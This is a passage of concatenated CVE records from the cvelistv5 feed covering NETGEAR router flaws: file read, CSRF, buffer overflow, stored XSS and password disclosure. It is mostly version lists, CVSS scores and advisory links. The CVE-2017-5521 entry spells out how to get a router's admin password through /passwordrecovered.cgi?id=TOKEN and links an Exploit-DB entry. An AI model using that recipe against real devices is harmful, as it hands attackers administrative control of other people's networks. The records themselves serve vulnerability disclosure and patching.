"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18769",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:P/A:N/C:H/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18769",
"datePublished": "2020-04-22T14:54:48",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18704
Vulnerability from cvelistv5
Published
2020-04-24 14:05
Modified
2024-08-05 21:28
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:28:55.978Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-24T14:05:03",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18704",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.60, D8500 before 1.0.3.29, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R6900P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8500 before 1.0.2.106, R8300 before 1.0.2.106, and WNDR3400v3 before 1.0.1.16."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:H/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000053198/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Gateways-PSV-2017-0590"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18704",
"datePublished": "2020-04-24T14:05:03",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:28:55.978Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18755
Vulnerability from cvelistv5
Published
2020-04-22 16:11
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.458Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:H/C:H/I:H/PR:N/S:U/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T16:11:40",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18755",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:H/C:H/I:H/PR:N/S:U/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18755",
"datePublished": "2020-04-22T16:11:40",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.458Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20713
Vulnerability from cvelistv5
Published
2020-04-16 15:37
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:07.571Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T15:37:27",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20713",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20713",
"datePublished": "2020-04-16T15:37:27",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:07.571Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-5521
Vulnerability from cvelistv5
Published
2017-01-17 09:22
Modified
2025-02-04 20:55
Severity ?
EPSS score ?
Summary
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.exploit-db.com/exploits/41205/ | exploit, x_refsource_EXPLOIT-DB | |
| http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/95457 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T15:04:14.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "41205",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/41205/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability"
},
{
"name": "95457",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/95457"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2017-5521",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-04T20:47:45.282013Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2022-09-08",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2017-5521"
},
"type": "kev"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-04T20:55:03.757Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-01-17T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-31T09:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "41205",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/41205/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability"
},
{
"name": "95457",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/95457"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-5521",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "41205",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/41205/"
},
{
"name": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability",
"refsource": "CONFIRM",
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability"
},
{
"name": "95457",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/95457"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-5521",
"datePublished": "2017-01-17T09:22:00.000Z",
"dateReserved": "2017-01-17T00:00:00.000Z",
"dateUpdated": "2025-02-04T20:55:03.757Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18700
Vulnerability from cvelistv5
Published
2020-04-24 14:15
Modified
2024-08-05 21:28
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:28:56.073Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:L/I:L/PR:N/S:C/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-24T14:15:11",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18700",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
